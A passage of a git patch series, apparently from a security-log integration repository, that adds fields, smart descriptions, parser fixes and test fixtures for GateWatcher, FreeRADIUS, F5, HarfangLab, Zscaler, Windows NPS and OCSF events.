+      "registered_domain": "pgoadcmgqfacj.com",
+      "top_level_domain": "com"
     },
     "gatewatcher": {
-      "domain_name": "pgoadcmgqfacj.com",
       "event_type": "dga",
       "flow_id": "729468278572",
       "gcap": "gcap-xxxxxxxx.domain.local",
@@ -41,6 +43,9 @@
       "version": "0.2"
     },
     "related": {
+      "hosts": [
+        "pgoadcmgqfacj.com"
+      ],
       "ip": [
         "1.1.1.1",
         "2.2.2.2"

From c0df60a2a1416c35ef229ef78b3dadb0133db124 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Tue, 17 Sep 2024 11:39:38 +0200
Subject: [PATCH 069/317] fix(GateWatcher): add smart-description for retrohunt
 events

---
 GateWatcher/aioniq/_meta/smart-descriptions.json | 15 +++++++++++++++
 1 file changed, 15 insertions(+)

diff --git a/GateWatcher/aioniq/_meta/smart-descriptions.json b/GateWatcher/aioniq/_meta/smart-descriptions.json
index 3ec572a81..cd51acc82 100644
--- a/GateWatcher/aioniq/_meta/smart-descriptions.json
+++ b/GateWatcher/aioniq/_meta/smart-descriptions.json
@@ -94,5 +94,20 @@
         "field": "destination.domain"
       }
      ]
+    },
+    {
+    "value": "{gatewatcher.event_type}: the {gatewatcher.ioc_type} indicator {gatewatcher.ioc_value} raised a detection",
+    "conditions": [
+      {
+        "field": "gatewatcher.event_type",
+        "value": "retrohunt"
+      },
+      {
+        "field": "gatewatcher.ioc_value"
+      },
+      {
+        "field": "gatewatcher.ioc_type"
+      }
+     ]
     }
 ]

From f635abfecf71268e054d0c6da6cc3e6b6c26f672 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Fri, 20 Sep 2024 11:05:01 +0200
Subject: [PATCH 070/317] fix(GateWatcher): fix taxonomy

---
 GateWatcher/aioniq/_meta/fields.yml   | 2 +-
 GateWatcher/aioniq/tests/malcore.json | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/GateWatcher/aioniq/_meta/fields.yml b/GateWatcher/aioniq/_meta/fields.yml
index e970bfffc..d0d85f7f6 100644
--- a/GateWatcher/aioniq/_meta/fields.yml
+++ b/GateWatcher/aioniq/_meta/fields.yml
@@ -154,7 +154,7 @@ gatewatcher.krb5:
 gatewatcher.malcore.code:
   description: Return code of the malcore analysis
   name: gatewatcher.malcore.code
-  type: number
+  type: keyword
 
 gatewatcher.malcore.detail_threat_found:
   description: Type of the detected threat
diff --git a/GateWatcher/aioniq/tests/malcore.json b/GateWatcher/aioniq/tests/malcore.json
index ebc7c83d1..ba95cc211 100644
--- a/GateWatcher/aioniq/tests/malcore.json
+++ b/GateWatcher/aioniq/tests/malcore.json
@@ -42,7 +42,7 @@
       "gcap": "gcap-xxxxxxxx.domain.local",
       "gcenter": "gcenter-xxxxxxxx.domain.local",
       "malcore": {
-        "code": 1,
+        "code": "1",
         "detail_threat_found": "Infected : Script.SWF.CVE-2014-0515+.C107 (B), Exp.SWF.Angler.D, Script.SWF.CVE-2014-0515+.C107, SWF/Exploit.ExKit.J trojan, Exploit.SWF.Agent.ja, Exploit.Agent.Script.371, Exploit.Swf.Agent.dvtnkm, Script.SWF.CVE-2014-0515++.C118, EXP/FLASH.Pubenush.E.Gen, Exploit.SWF"
       },
       "reporting_token": "No GBOX",

From e7b942179a209440aca02f18afe823033eda9ccd Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia <leonid.voloshyn@sekoia.io>
Date: Fri, 20 Sep 2024 13:16:56 +0300
Subject: [PATCH 071/317] Add smart desc for `ignoring request`

---
 .../freeradius/_meta/smart-descriptions.json  | 21 +++++++++++++++++++
 1 file changed, 21 insertions(+)

diff --git a/FreeRADIUS/freeradius/_meta/smart-descriptions.json b/FreeRADIUS/freeradius/_meta/smart-descriptions.json
index 2f46e4e4b..9ee11971a 100644
--- a/FreeRADIUS/freeradius/_meta/smart-descriptions.json
+++ b/FreeRADIUS/freeradius/_meta/smart-descriptions.json
@@ -107,5 +107,26 @@
         "field": "event.reason"
       }
     ]
+  },
+  {
+    "value": "Ignoring request to auth address * port {destination.port} bound to server {host.name} from unknown client {source.ip} port {source.port} proto udp",
+    "conditions": [
+      {
+        "field": "freeradius.outcome",
+        "value": "Ignoring request to auth address"
+      },
+      {
+        "field": "destination.port"
+      },
+      {
+        "field": "host.name"
+      },
+      {
+        "field": "source.ip"
+      },
+      {
+        "field": "source.port"
+      }
+    ]
   }
 ]

From 6b6375ca2377029fae141df97fad2ef59ecff345 Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia <leonid.voloshyn@sekoia.io>
Date: Fri, 20 Sep 2024 15:09:48 +0300
Subject: [PATCH 072/317] Ignore whitespace before `Rule`

---
 F5 Networks/f5-big-ip/ingest/parser.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/F5 Networks/f5-big-ip/ingest/parser.yml b/F5 Networks/f5-big-ip/ingest/parser.yml
index d100bdf97..77ee4ea1b 100644
--- a/F5 Networks/f5-big-ip/ingest/parser.yml	
+++ b/F5 Networks/f5-big-ip/ingest/parser.yml	
@@ -35,7 +35,7 @@ pipeline:
           RULE_HTTP_REQUEST: "<HTTP_REQUEST>: LOGS: %{RULE_LOG_MESSAGE:rule_message}"
           RULE_HTTP_RESPONSE: "<HTTP_RESPONSE_RELEASE>: %{IPORHOST:destination_ip}:%{POSINT:destination_port}: HTTP: %{POSINT:http_response_status_code} response to( %{IPORHOST:destination_ip}:%{POSINT:destination_port})? from( %{IPORHOST:source_ip}:%{POSINT:source_port} )?URL: %{NOTSPACE:url_original} %{DATA} %{TLS:tls_version_protocol}%{NUMBER:tls_version}"
           RULE_LOG: "%{HEADER}: Rule %{NOTSPACE:rule_name} (%{RULE_HTTP_REQUEST}|%{RULE_HTTP_RESPONSE})"
-          RULE_LOG_REASON_ONLY: '(%{HEADER}:\s?)? Rule %{NOTSPACE:rule_name} \: %{GREEDYDATA:rule_message}'
+          RULE_LOG_REASON_ONLY: '(%{HEADER}:\s?)?\s?Rule %{NOTSPACE:rule_name} \: %{GREEDYDATA:rule_message}'
 
           # audit message
           AUDIT_LOG: '%{HEADER}:\s(\d*:\d*: )AUDIT - %{GREEDYDATA:audit_message}'

From dd190e347073a2b65085c06f6191e4d3c54f302f Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Mon, 23 Sep 2024 10:04:16 +0200
Subject: [PATCH 073/317] fix(Harfanglab): add missing fields.

---
 HarfangLab/harfanglab/_meta/fields.yml  | 10 ++++++++++
 HarfangLab/harfanglab/ingest/parser.yml |  2 ++
 2 files changed, 12 insertions(+)

diff --git a/HarfangLab/harfanglab/_meta/fields.yml b/HarfangLab/harfanglab/_meta/fields.yml
index e57a69bca..0a45888ac 100644
--- a/HarfangLab/harfanglab/_meta/fields.yml
+++ b/HarfangLab/harfanglab/_meta/fields.yml
@@ -128,6 +128,11 @@ action.properties.DetectionUser:
   name: action.properties.DetectionUser
   type: keyword
 
+action.properties.Domain:
+  description: ''
+  name: action.properties.Domain
+  type: keyword
+
 action.properties.ElevatedToken:
   description: ''
   name: action.properties.ElevatedToken
@@ -778,6 +783,11 @@ action.properties.Unused6:
   name: action.properties.Unused6
   type: keyword
 
+action.properties.User:
+  description: ''
+  name: action.properties.User
+  type: keyword
+
 action.properties.ValidatedPolicy:
   description: ''
   name: action.properties.ValidatedPolicy
diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml
index df5369509..129a3ea38 100644
--- a/HarfangLab/harfanglab/ingest/parser.yml
+++ b/HarfangLab/harfanglab/ingest/parser.yml
@@ -300,6 +300,7 @@ stages:
           action.properties.DetectionID: "{{json_event.message.event_data.get('Detection ID')}}"
           action.properties.DetectionTime: "{{json_event.message.event_data.get('Detection Time')}}"
           action.properties.DetectionUser: "{{json_event.message.event_data.get('Detection User')}}"
+          action.properties.Domain: "{{json_event.message.event_data.get('Domain')}}"
           action.properties.ElevatedToken: "{{json_event.message.event_data.get('ElevatedToken')}}"
           action.properties.EngineVersion: "{{json_event.message.event_data.get('Engine Version')}}"
           action.properties.Engineup-to-date: "{{json_event.message.event_data.get('Engine up-to-date')}}"
@@ -428,6 +429,7 @@ stages:
           action.properties.Unused5: "{{json_event.message.event_data.get('Unused5')}}"
           action.properties.Unused6: "{{json_event.message.event_data.get('Unused6')}}"
           action.properties.Unused: "{{json_event.message.event_data.get('Unused')}}"
+          action.properties.User: "{{json_event.message.event_data.get('User')}}"
           action.properties.ValidatedPolicy: "{{json_event.message.event_data.get('ValidatedPolicy')}}"
           action.properties.ValidatedSigningLevel: "{{json_event.message.event_data.get('ValidatedSigningLevel')}}"
           action.properties.VerificationError: "{{json_event.message.event_data.get('VerificationError')}}"

From 01c4f0cc78769c75eee7ab525ca792a7c2115dbc Mon Sep 17 00:00:00 2001
From: rombernier <romain.bernier@sekoia.io>
Date: Tue, 24 Sep 2024 11:43:16 +0200
Subject: [PATCH 074/317] update HarfangLab

---
 HarfangLab/harfanglab/_meta/fields.yml  | 10 ++++++++++
 HarfangLab/harfanglab/ingest/parser.yml |  2 ++
 2 files changed, 12 insertions(+)

diff --git a/HarfangLab/harfanglab/_meta/fields.yml b/HarfangLab/harfanglab/_meta/fields.yml
index 0a45888ac..a9fe32974 100644
--- a/HarfangLab/harfanglab/_meta/fields.yml
+++ b/HarfangLab/harfanglab/_meta/fields.yml
@@ -338,6 +338,11 @@ action.properties.LogonType:
   name: action.properties.LogonType
   type: keyword
 
+action.properties.MemberName:
+  description: ''
+  name: action.properties.MemberName
+  type: keyword
+
 action.properties.NRIengineversion:
   description: ''
   name: action.properties.NRIengineversion
@@ -423,6 +428,11 @@ action.properties.PreExecutionStatus:
   name: action.properties.PreExecutionStatus
   type: keyword
 
+action.properties.PrivilegeList:
+  description: ''
+  name: action.properties.PrivilegeList
+  type: keyword
+
 action.properties.ProcessId:
   description: ''
   name: action.properties.ProcessId
diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml
index 129a3ea38..832463715 100644
--- a/HarfangLab/harfanglab/ingest/parser.yml
+++ b/HarfangLab/harfanglab/ingest/parser.yml
@@ -342,6 +342,7 @@ stages:
           action.properties.LogonGuid: "{{json_event.message.event_data.get('LogonGuid')}}"
           action.properties.LogonProcessName: "{{json_event.message.event_data.get('LogonProcessName')}}"
           action.properties.LogonType: "{{json_event.message.event_data.get('LogonType')}}"
+          action.properties.MemberName: "{{json_event.message.event_data.get('MemberName')}}"
           action.properties.NRIengineversion: "{{json_event.message.event_data.get('NRI engine version')}}"
           action.properties.NRIsecurityintelligenceversion: "{{json_event.message.event_data.get('NRI security intelligence version')}}"
           action.properties.NotValidAfter: "{{json_event.message.event_data.get('NotValidAfter')}}"
@@ -359,6 +360,7 @@ stages:
           action.properties.PostCleanStatus: "{{json_event.message.event_data.get('Post Clean Status')}}"
           action.properties.PreAuthType: "{{json_event.message.event_data.get('PreAuthType')}}"
           action.properties.PreExecutionStatus: "{{json_event.message.event_data.get('Pre Execution Status')}}"
+          action.properties.PrivilegeList: "{{json_event.message.event_data.get('PrivilegeList')}}"
           action.properties.ProcessId: "{{json_event.message.event_data.get('ProcessId')}}"
           action.properties.ProcessName: "{{json_event.message.event_data.get('Process Name') or json_event.message.event_data.get('ProcessName')}}"
           action.properties.ProcessNameBuffer: "{{json_event.message.event_data.get('ProcessNameBuffer')}}"

From 7d1e4ab7ed2dd9fe5c4e3b1b7cbc8570c1d06b1e Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia <leonid.voloshyn@sekoia.io>
Date: Tue, 24 Sep 2024 14:42:06 +0300
Subject: [PATCH 075/317] Zscaler - add relationships

---
 .../zscaler-zia/_meta/smart-descriptions.json | 58 ++++++++++++++++++-
 1 file changed, 57 insertions(+), 1 deletion(-)

diff --git a/Zscaler/zscaler-zia/_meta/smart-descriptions.json b/Zscaler/zscaler-zia/_meta/smart-descriptions.json
index e819ad2f4..d40242843 100644
--- a/Zscaler/zscaler-zia/_meta/smart-descriptions.json
+++ b/Zscaler/zscaler-zia/_meta/smart-descriptions.json
@@ -12,6 +12,13 @@
       {
         "field": "zscaler.zia.resource"
       }
+    ],
+    "relationships": [
+      {
+        "source": "source.ip",
+        "target": "zscaler.zia.resource",
+        "type": "accessed"
+      }
     ]
   },
   {
@@ -30,6 +37,13 @@
       {
         "field": "file.name"
       }
+    ],
+    "relationships": [
+      {
+        "source": "user.email",
+        "target": "file.name",
+        "type": "accessed"
+      }
     ]
   },
   {
@@ -45,6 +59,13 @@
       {
         "field": "dns.question.name"
       }
+    ],
+    "relationships": [
+      {
+        "source": "user.email",
+        "target": "dns.question.name",
+        "type": "requested"
+      }
     ]
   },
   {
@@ -72,6 +93,13 @@
       {
         "field": "destination.address"
       }
+    ],
+    "relationships": [
+      {
+        "source": "source.ip",
+        "target": "destination.address",
+        "type": "connected"
+      }
     ]
   },
   {
@@ -99,6 +127,13 @@
       {
         "field": "destination.address"
       }
+    ],
+    "relationships": [
+      {
+        "source": "source.ip",
+        "target": "destination.address",
+        "type": "tried to connect"
+      }
     ]
   },
   {
@@ -118,6 +153,13 @@
       {
         "field": "destination.address"
       }
+    ],
+    "relationships": [
+      {
+        "source": "user.email",
+        "target": "destination.address",
+        "type": "connected"
+      }
     ]
   },
   {
@@ -137,10 +179,17 @@
       {
         "field": "destination.address"
       }
+    ],
+    "relationships": [
+      {
+        "source": "source.ip",
+        "target": "destination.address",
+        "type": "connected"
+      }
     ]
   },
   {
-    "value": "{user.email} requested {url.domain} and was {event.action} ",
+    "value": "{user.email} requested {url.domain} and was {event.action}",
     "conditions": [
       {
         "field": "event.category",
@@ -155,6 +204,13 @@
       {
         "field": "event.action"
       }
+    ],
+    "relationships": [
+      {
+        "source": "user.email",
+        "target": "url.domain",
+        "type": "requested"
+      }
     ]
   }
 ]

From 87e6f28841bd09bcfd12ecdf157c634cab09b7a1 Mon Sep 17 00:00:00 2001
From: "vladyslav.guriev" <vladyslav.guriev@gmail.com>
Date: Wed, 25 Sep 2024 14:41:04 +0300
Subject: [PATCH 076/317] Fix: Windows add CallingStationID

---
 Windows/windows/_meta/fields.yml        |  5 ++
 Windows/windows/ingest/parser.yml       |  1 +
 Windows/windows/tests/Event_6272.json   |  1 +
 Windows/windows/tests/Event_6273.json   |  1 +
 Windows/windows/tests/process_6272.json | 78 +++++++++++++++++++++++++
 5 files changed, 86 insertions(+)
 create mode 100644 Windows/windows/tests/process_6272.json

diff --git a/Windows/windows/_meta/fields.yml b/Windows/windows/_meta/fields.yml
index a67b2755f..447421f6d 100644
--- a/Windows/windows/_meta/fields.yml
+++ b/Windows/windows/_meta/fields.yml
@@ -763,6 +763,11 @@ action.properties.ProcessName:
   name: action.properties.ProcessName
   type: keyword
 
+action.properties.CallingStationID:
+  description: ''
+  name: action.properties.CallingStationID
+  type: keyword
+
 action.properties.ProcessPath:
   description: ''
   name: action.properties.ProcessPath
diff --git a/Windows/windows/ingest/parser.yml b/Windows/windows/ingest/parser.yml
index 4e47c5e7a..1c4eee181 100644
--- a/Windows/windows/ingest/parser.yml
+++ b/Windows/windows/ingest/parser.yml
@@ -332,6 +332,7 @@ stages:
           action.properties.DestinationPort: "{{json.event.DestinationPort or json.event.DestPort}}"
           action.properties.ErrorCode: '{{ json.event.get("Error Code") or json.event.ErrorCode }}'
           action.properties.ProcessName: '{{ json.event.ProcessName or json.event.get("Process Name") }}'
+          action.properties.CallingStationID: '{{ json.event.CallingStationID }}'
 
           action.properties.ThreatName: '{{ json.event.get("Threat Name") }}'
           action.properties.DetectionUser: '{{ json.event.get("Detection User") }}'
diff --git a/Windows/windows/tests/Event_6272.json b/Windows/windows/tests/Event_6272.json
index 3d99dd9ef..4a3212af2 100644
--- a/Windows/windows/tests/Event_6272.json
+++ b/Windows/windows/tests/Event_6272.json
@@ -18,6 +18,7 @@
         "AuthenticationProvider": "Windows",
         "AuthenticationServer": "auth.example.org",
         "AuthenticationType": "PEAP",
+        "CallingStationID": "a9-7c-7d-ac-47-67",
         "Category": "Network Policy Server",
         "ClientIPAddress": "1.2.3.4",
         "ClientName": "ELEBEYCOBI",
diff --git a/Windows/windows/tests/Event_6273.json b/Windows/windows/tests/Event_6273.json
index db18b5038..8ad5a2226 100644
--- a/Windows/windows/tests/Event_6273.json
+++ b/Windows/windows/tests/Event_6273.json
@@ -18,6 +18,7 @@
         "AuthenticationProvider": "Windows",
         "AuthenticationServer": "auth.example.org",
         "AuthenticationType": "EAP",
+        "CallingStationID": "a9-7c-7d-ac-47-67",
         "Category": "Network Policy Server",
         "ClientIPAddress": "1.2.3.4",
         "ClientName": "1.2.3.4",
diff --git a/Windows/windows/tests/process_6272.json b/Windows/windows/tests/process_6272.json
new file mode 100644
index 000000000..af1d9fe1d
--- /dev/null
+++ b/Windows/windows/tests/process_6272.json
@@ -0,0 +1,78 @@
+{
+  "input": {
+    "message": "{\"EventTime\":\"2024-09-18 10:08:41\",\"Hostname\":\"test\",\"Keywords\":-9214364837600034816,\"EventType\":\"AUDIT_SUCCESS\",\"SeverityValue\":2,\"Severity\":\"INFO\",\"EventID\":6272,\"SourceName\":\"Microsoft-Windows-Security-Auditing\",\"ProviderGuid\":\"{000000000-0000-0000-A5BA-3E3B0328C30D}\",\"Version\":2,\"Task\":12552,\"OpcodeValue\":0,\"RecordNumber\":2324634,\"ActivityID\":\"{9481D23D-1111-1111-1111-1DD10B0E2623}\",\"ProcessID\":672,\"ThreadID\":3752,\"Channel\":\"Security\",\"Message\":\"Le serveur NPS a accorde lacces a un utilisateur. Utilisateur : ID de securite : S-1-5-21-1111111111-111111111-1111111111-1111 Nom de compte : testUser Domaine de compte : NT01 Nom de compte complet : net/Administrateurs/ITUser/testUser Ordinateur client : ID de securite : S-1-0-0 Nom de compte : - Nom de compte complet : - Identificateur de la station appelee : 1.2.3.4 Identificateur de la station appelante : 10.24.25.25 Serveur NAS : Adresse IPv4 du serveur NAS : 1.2.3.4 Adresse IPv6 du serveur NAS : - Identificateur du serveur NAS : - Type de port du serveur NAS : Virtuel Port du serveur NAS : 450560 Client RADIUS : Nom convivial du client : FW01 Adresse IP du client : 1.2.3.4 Informations detaillees sur lauthentification : Nom de strategie de demande de connexion : interface_admin_reseau Nom de strategie reseau : FWASA01_Admin Fournisseur dauthentification : RADIUS distant vers le mappage utilisateur Windows Serveur dauthentification : 1.2.3.4 Type dauthentification : - Type EAP : - Identificateur de la session du compte : - Resultats de la journalisation : Les informations de suivi ont ete inscrites dans le fichier journal local. \",\"Category\":\"Network Policy Server\",\"Opcode\":\"Informations\",\"SubjectUserSid\":\"S-1-5-21-1111111111-111111111-1111111111-1111\",\"SubjectUserName\":\"testUser\",\"SubjectDomainName\":\"NT01\",\"FullyQualifiedSubjectUserName\":\"test.net/Administrateurs/ITUser/testUser\",\"SubjectMachineSID\":\"S-1-0-0\",\"SubjectMachineName\":\"-\",\"FullyQualifiedSubjectMachineName\":\"-\",\"CalledStationID\":\"1.2.3.4\",\"CallingStationID\":\"10.24.25.25\",\"NASIPv4Address\":\"1.2.3.4\",\"NASIPv6Address\":\"-\",\"NASIdentifier\":\"-\",\"NASPortType\":\"Virtuel\",\"NASPort\":\"450560\",\"ClientName\":\"FW01\",\"ClientIPAddress\":\"1.2.3.4\",\"ProxyPolicyName\":\"interface_admin_reseau\",\"NetworkPolicyName\":\"FWASA01_Admin\",\"AuthenticationProvider\":\"RADIUS distant vers le mappage utilisateur Windows\",\"AuthenticationServer\":\"1.2.3.4\",\"AuthenticationType\":\"-\",\"EAPType\":\"-\",\"AccountSessionIdentifier\":\"-\",\"LoggingResult\":\"Les informations de suivi ont ete inscrites dans le fichier journal local.\",\"EventReceivedTime\":\"2024-09-18 10:09:24\",\"SourceModuleName\":\"eventlog41\",\"SourceModuleType\":\"im_msvistalog\"}"
+  },
+  "expected": {
+    "message": "{\"EventTime\":\"2024-09-18 10:08:41\",\"Hostname\":\"test\",\"Keywords\":-9214364837600034816,\"EventType\":\"AUDIT_SUCCESS\",\"SeverityValue\":2,\"Severity\":\"INFO\",\"EventID\":6272,\"SourceName\":\"Microsoft-Windows-Security-Auditing\",\"ProviderGuid\":\"{000000000-0000-0000-A5BA-3E3B0328C30D}\",\"Version\":2,\"Task\":12552,\"OpcodeValue\":0,\"RecordNumber\":2324634,\"ActivityID\":\"{9481D23D-1111-1111-1111-1DD10B0E2623}\",\"ProcessID\":672,\"ThreadID\":3752,\"Channel\":\"Security\",\"Message\":\"Le serveur NPS a accorde lacces a un utilisateur. Utilisateur : ID de securite : S-1-5-21-1111111111-111111111-1111111111-1111 Nom de compte : testUser Domaine de compte : NT01 Nom de compte complet : net/Administrateurs/ITUser/testUser Ordinateur client : ID de securite : S-1-0-0 Nom de compte : - Nom de compte complet : - Identificateur de la station appelee : 1.2.3.4 Identificateur de la station appelante : 10.24.25.25 Serveur NAS : Adresse IPv4 du serveur NAS : 1.2.3.4 Adresse IPv6 du serveur NAS : - Identificateur du serveur NAS : - Type de port du serveur NAS : Virtuel Port du serveur NAS : 450560 Client RADIUS : Nom convivial du client : FW01 Adresse IP du client : 1.2.3.4 Informations detaillees sur lauthentification : Nom de strategie de demande de connexion : interface_admin_reseau Nom de strategie reseau : FWASA01_Admin Fournisseur dauthentification : RADIUS distant vers le mappage utilisateur Windows Serveur dauthentification : 1.2.3.4 Type dauthentification : - Type EAP : - Identificateur de la session du compte : - Resultats de la journalisation : Les informations de suivi ont ete inscrites dans le fichier journal local. \",\"Category\":\"Network Policy Server\",\"Opcode\":\"Informations\",\"SubjectUserSid\":\"S-1-5-21-1111111111-111111111-1111111111-1111\",\"SubjectUserName\":\"testUser\",\"SubjectDomainName\":\"NT01\",\"FullyQualifiedSubjectUserName\":\"test.net/Administrateurs/ITUser/testUser\",\"SubjectMachineSID\":\"S-1-0-0\",\"SubjectMachineName\":\"-\",\"FullyQualifiedSubjectMachineName\":\"-\",\"CalledStationID\":\"1.2.3.4\",\"CallingStationID\":\"10.24.25.25\",\"NASIPv4Address\":\"1.2.3.4\",\"NASIPv6Address\":\"-\",\"NASIdentifier\":\"-\",\"NASPortType\":\"Virtuel\",\"NASPort\":\"450560\",\"ClientName\":\"FW01\",\"ClientIPAddress\":\"1.2.3.4\",\"ProxyPolicyName\":\"interface_admin_reseau\",\"NetworkPolicyName\":\"FWASA01_Admin\",\"AuthenticationProvider\":\"RADIUS distant vers le mappage utilisateur Windows\",\"AuthenticationServer\":\"1.2.3.4\",\"AuthenticationType\":\"-\",\"EAPType\":\"-\",\"AccountSessionIdentifier\":\"-\",\"LoggingResult\":\"Les informations de suivi ont ete inscrites dans le fichier journal local.\",\"EventReceivedTime\":\"2024-09-18 10:09:24\",\"SourceModuleName\":\"eventlog41\",\"SourceModuleType\":\"im_msvistalog\"}",
+    "event": {
+      "code": "6272",
+      "message": "Le serveur NPS a accorde lacces a un utilisateur. Utilisateur : ID de securite : S-1-5-21-1111111111-111111111-1111111111-1111 Nom de compte : testUser Domaine de compte : NT01 Nom de compte complet : net/Administrateurs/ITUser/testUser Ordinateur client : ID de securite : S-1-0-0 Nom de compte : - Nom de compte complet : - Identificateur de la station appelee : 1.2.3.4 Identificateur de la station appelante : 10.24.25.25 Serveur NAS : Adresse IPv4 du serveur NAS : 1.2.3.4 Adresse IPv6 du serveur NAS : - Identificateur du serveur NAS : - Type de port du serveur NAS : Virtuel Port du serveur NAS : 450560 Client RADIUS : Nom convivial du client : FW01 Adresse IP du client : 1.2.3.4 Informations detaillees sur lauthentification : Nom de strategie de demande de connexion : interface_admin_reseau Nom de strategie reseau : FWASA01_Admin Fournisseur dauthentification : RADIUS distant vers le mappage utilisateur Windows Serveur dauthentification : 1.2.3.4 Type dauthentification : - Type EAP : - Identificateur de la session du compte : - Resultats de la journalisation : Les informations de suivi ont ete inscrites dans le fichier journal local. ",
+      "outcome": "success",
+      "provider": "Microsoft-Windows-Security-Auditing"
+    },
+    "action": {
+      "id": 6272,
+      "name": "Network Policy Server granted access to a user",
+      "outcome": "success",
+      "properties": {
+        "AuthenticationProvider": "RADIUS distant vers le mappage utilisateur Windows",
+        "AuthenticationServer": "1.2.3.4",
+        "AuthenticationType": "-",
+        "CallingStationID": "10.24.25.25",
+        "Category": "Network Policy Server",
+        "ClientIPAddress": "1.2.3.4",
+        "ClientName": "FW01",
+        "EAPType": "-",
+        "EventType": "AUDIT_SUCCESS",
+        "Keywords": "-9214364837600034816",
+        "NASIdentifier": "-",
+        "NASPort": "450560",
+        "NASPortType": "Virtuel",
+        "NetworkPolicyName": "FWASA01_Admin",
+        "OpcodeValue": 0,
+        "ProviderGuid": "{000000000-0000-0000-A5BA-3E3B0328C30D}",
+        "ProxyPolicyName": "interface_admin_reseau",
+        "Severity": "INFO",
+        "SourceName": "Microsoft-Windows-Security-Auditing",
+        "SubjectDomainName": "NT01",
+        "SubjectUserName": "testUser",
+        "SubjectUserSid": "S-1-5-21-1111111111-111111111-1111111111-1111",
+        "Task": 12552
+      },
+      "record_id": 2324634,
+      "type": "Security"
+    },
+    "host": {
+      "hostname": "test",
+      "name": "test"
+    },
+    "log": {
+      "hostname": "test",
+      "level": "info"
+    },
+    "os": {
+      "family": "windows",
+      "platform": "windows"
+    },
+    "process": {
+      "id": 672,
+      "pid": 672,
+      "thread": {
+        "id": 3752
+      }
+    },
+    "related": {
+      "hosts": [
+        "test"
+      ],
+      "user": [
+        "testUser"
+      ]
+    },
+    "user": {
+      "domain": "NT01",
+      "id": "S-1-5-21-1111111111-111111111-1111111111-1111",
+      "name": "testUser"
+    }
+  }
+}
\ No newline at end of file

From 84cff00a0efd6679e42b1e9a97bb9d009570939c Mon Sep 17 00:00:00 2001
From: "vladyslav.guriev" <vladyslav.guriev@gmail.com>
Date: Wed, 25 Sep 2024 14:42:10 +0300
Subject: [PATCH 077/317] apply linter

---
 Windows/windows/_meta/fields.yml | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/Windows/windows/_meta/fields.yml b/Windows/windows/_meta/fields.yml
index 447421f6d..88ac632ea 100644
--- a/Windows/windows/_meta/fields.yml
+++ b/Windows/windows/_meta/fields.yml
@@ -148,6 +148,11 @@ action.properties.CallerProcessName:
   name: action.properties.CallerProcessName
   type: keyword
 
+action.properties.CallingStationID:
+  description: ''
+  name: action.properties.CallingStationID
+  type: keyword
+
 action.properties.Category:
   description: ''
   name: action.properties.Category
@@ -763,11 +768,6 @@ action.properties.ProcessName:
   name: action.properties.ProcessName
   type: keyword
 
-action.properties.CallingStationID:
-  description: ''
-  name: action.properties.CallingStationID
-  type: keyword
-
 action.properties.ProcessPath:
   description: ''
   name: action.properties.ProcessPath

From c8a3fc7224c5280779ae736ae894f3400b2421bd Mon Sep 17 00:00:00 2001
From: "vladyslav.guriev" <vladyslav.guriev@gmail.com>
Date: Wed, 25 Sep 2024 14:44:21 +0300
Subject: [PATCH 078/317] apply prettier

---
 Windows/windows/ingest/parser.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/Windows/windows/ingest/parser.yml b/Windows/windows/ingest/parser.yml
index 1c4eee181..8107e623a 100644
--- a/Windows/windows/ingest/parser.yml
+++ b/Windows/windows/ingest/parser.yml
@@ -332,7 +332,7 @@ stages:
           action.properties.DestinationPort: "{{json.event.DestinationPort or json.event.DestPort}}"
           action.properties.ErrorCode: '{{ json.event.get("Error Code") or json.event.ErrorCode }}'
           action.properties.ProcessName: '{{ json.event.ProcessName or json.event.get("Process Name") }}'
-          action.properties.CallingStationID: '{{ json.event.CallingStationID }}'
+          action.properties.CallingStationID: "{{ json.event.CallingStationID }}"
 
           action.properties.ThreatName: '{{ json.event.get("Threat Name") }}'
           action.properties.DetectionUser: '{{ json.event.get("Detection User") }}'

From 2b493beed70dabdcdb57fd9369ecf65f96b3ff89 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Fri, 27 Sep 2024 17:08:08 +0200
Subject: [PATCH 079/317] fix(OCSF): fix the parsing of dns anwsers

---
 OCSF/ocsf/ingest/parser.yml              |  2 +-
 OCSF/ocsf/tests/test_dns_activity_3.json | 90 ++++++++++++++++++++++++
 2 files changed, 91 insertions(+), 1 deletion(-)
 create mode 100644 OCSF/ocsf/tests/test_dns_activity_3.json

diff --git a/OCSF/ocsf/ingest/parser.yml b/OCSF/ocsf/ingest/parser.yml
index 19713e433..765a6a76d 100644
--- a/OCSF/ocsf/ingest/parser.yml
+++ b/OCSF/ocsf/ingest/parser.yml
@@ -1000,7 +1000,7 @@ stages:
                 {%- if item.get('type') != None -%}"type": "{{item.type}}",{%- endif -%}
                 {%- if item.get('ttl') != None -%}"ttl": "{{item.ttl}}",{%- endif -%}
                 {%- if item.get('rdata') != None -%}"data": "{{item.rdata}}",{%- endif -%}
-            }
+            },
             {%- endfor -%}
             ]
         filter: "{{ parse_event.message.get('answers') != None }}"
diff --git a/OCSF/ocsf/tests/test_dns_activity_3.json b/OCSF/ocsf/tests/test_dns_activity_3.json
new file mode 100644
index 000000000..f8f4e6433
--- /dev/null
+++ b/OCSF/ocsf/tests/test_dns_activity_3.json
@@ -0,0 +1,90 @@
+{
+  "input": {
